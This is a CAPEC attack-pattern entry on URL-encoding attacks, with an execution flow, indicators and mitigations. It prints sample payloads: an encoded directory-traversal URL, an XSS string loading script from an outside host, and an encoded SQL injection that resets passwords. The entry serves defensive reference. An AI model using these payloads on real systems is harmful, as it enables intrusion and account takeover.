CAPEC

Common Attack Pattern Enumeration and Classification
Common Attack Pattern Enumeration and Classification

A Community Knowledge Resource for Building Secure Software

Home > CAPEC List > Individual CAPEC Dictionary Definition (Release 1.1)   View the CAPEC List

Individual CAPEC Dictionary Definition (Release 1.1)
Individual CAPEC Dictionary Definition (Release 1.1)

URL Encoding
Attack Pattern ID
Pattern Abstraction: Standard

72

Typical Severity

High

Description

Summary

This attack targets the encoding of the URL. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE).  For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The attacker could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an attacker may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section).

Attack Execution Flow

  1. 1- The attacker accesses the server using a specific URL.

  2. 2- The attacker tries to encode some special characters in the URL. The attacker finds out that some characters are not filtered properly.

  3. 3- The attacker crafts a malicious URL string request and sends it to the server.

  4. 4- The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters may have harmful consequences.

Attack Prerequisites

The application should accepts and decodes URL input.

The application performs insufficient filtering/canonicalization on the URLs.

Typical Likelihood of Exploit

High

Methods of Attack
  • Injection
  • Protocol Manipulation
  • API Abuse
Examples-Instances

Description

Attack Example: URL Encodings in IceCast MP3 Server.

The following type of encoded string has been known traverse directories against the IceCast MP3 server9:
http://[targethost]:8000/somefile/%2E%2E/target.mp3
or using
"/%25%25/" instead of "/../".

The control character ".." can be used by an attacker to escape the document root.

Related Vulnerability

CVE-2001-0784

Description

Cross-Site Scripting

URL-Encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f
www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e

HTML execution: <script src=”http://www.badplace.com/nasty.js”></script>

From "URL encoded attacks", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html

Description

SQL Injection

Original database query in the example file - “login.asp”: SQLQuery = “SELECT preferences FROM logintable WHERE userid=’” & Request.QueryString(“userid”) & “’ AND password=’” & Request.QueryString(“password”) & “’;”

URL-encoded attack: http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd
%3d%270wn3d%27%3b--%00

Executed database query: SELECT preferences FROM logintable WHERE userid=’bob’; update logintable set password=’0wn3d’;

From "URL encoded attacks", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html

Attacker Skill or Knowledge Required

Low - An attacker can try special characters in the URL and bypass the URL validation. Medium - The attacker may write a script to defeat the input filtering mechanism.

Probing Techniques

An attacker can manually inject special characters in the URL string request and observe the results of the request.

Custom scripts can also be used. For example, a good script for verifying the correct interpretation of UTF-8 encoded characters can be found at http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt

Automated tools such as fuzzer can be used to test the URL decoding and filtering.

Indicators-Warnings of Attack

If the first decoding process has left some invalid or blacklisted characters, that may be a sign that the request is malicious.

Traffic filtering with IDS (or proxy) can detect requests with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks.

Obfuscation Techniques

Sometime the percent escaping can be used to obfuscate the attack itself.

Alternative method of data encoding can be used.

Obfuscation technique such as IP address encoding can also be used (See reference section : "URL encoded attacks", by Gunter Ollmann).

Solutions and Mitigations

Refer to the RFCs to safelly decode URL.

Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.

There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).

Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.

Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Test your decoding process against malicious input.

Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)

When client input is required from web-based forms, avoid using the “GET” method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the “POST method whenever possible.

Attack Motivation-Consequences
  • Information Leakage
  • Denial of Service
  • Run Arbitrary Code
  • Information Leakage
  • Privilege Escalation
Context Description

Most web programming languages have built in API to perform URL Encoding and URL Decoding. For instance PHP uses "urlencode(string)" and "urldecode(string)". Java uses "java.net.URLEncode.encode(String)".

Related Weaknesses
CWE-IDWeakness NameWeakness Relationship Type
173Failure to Handle Alternate EncodingTargeted
177Failure to Handle URL Encoding (Hex Encoding)Targeted
171Cleansing, Canonicalization, and Comparison ErrorsTargeted
172Encoding ErrorTargeted
73External Control of File Name or PathTargeted
21Pathname Traversal and Equivalence ErrorsTargeted
74Failure to Sanitize Data into a Different Plane (aka 'Injection')Targeted
20Insufficient Input ValidationTargeted
Related Attack Patterns
IDNameRelationship TypeRelationship Description
64Using Slashes and URL Encoding Combined to Bypass Validation LogicMore Abstract
79Using Slashes in Alternate EncodingSimilar
71Using Unicode Encoding to Bypass Validation LogicSimilar
43Exploiting Multiple Input Interpretation LayersSimilar
Using Alternate Encodings to Bypass Validation LogicMore Detailed
Related Security Principles
  • Reluctance to Trust
Purpose

Penetration

Exploitation

CIA Impact
Confidentiality ImpactIntegrity ImpactAvailability Impact
HighHighMedium
Technical Context
Architectural ParadigmFrameworkPlatformLanguage
Client-ServerAllAllAll
References

G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004.

CWE – Input Validation

URL encoded attacks, by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html

Uniform Resource Identifier (URI): Generic Syntax, RFC 3886 - http://www.ietf.org/rfc/rfc3986.txt

URL Uniform Resource Locators (URL) RFC - http://rfc.net/rfc1738.html

URL encoding reference - http://www.w3schools.com/tags/ref_urlencode.asp

The URLEncode and URLDecode Page - http://www.albionresearch.com/misc/urlencode.php

David Wheeler - Validating URIs - http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS

Source
Submission(s)
SubmitterOrganizationDateComment
G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004.Cigital, Inc2007-03-01
Modification(s)
ModifierOrganizationDateComment
Eric DalciCigital, Inc2007-02-13Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software"
Sean BarnumCigital, Inc2007-03-07Review and revise
Richard StruseVOXEM, Inc2007-03-26Review and feedback leading to changes in Related Attack Patterns
Sean BarnumCigital, Inc2007-04-13Modified pattern content according to review and feedback
Back to top
 

CAPEC is sponsored by the National Cyber Security Division of the U.S. Department of Homeland Security.

Vision and Technical Leadership provided by Cigital, Inc.

This Web site is hosted by The MITRE Corporation.
Copyright 2008, The MITRE Corporation.

Contact capec@mitre.org for more information.
Page Last Updated: April 18, 2008
Privacy policy
Terms of use
Contact us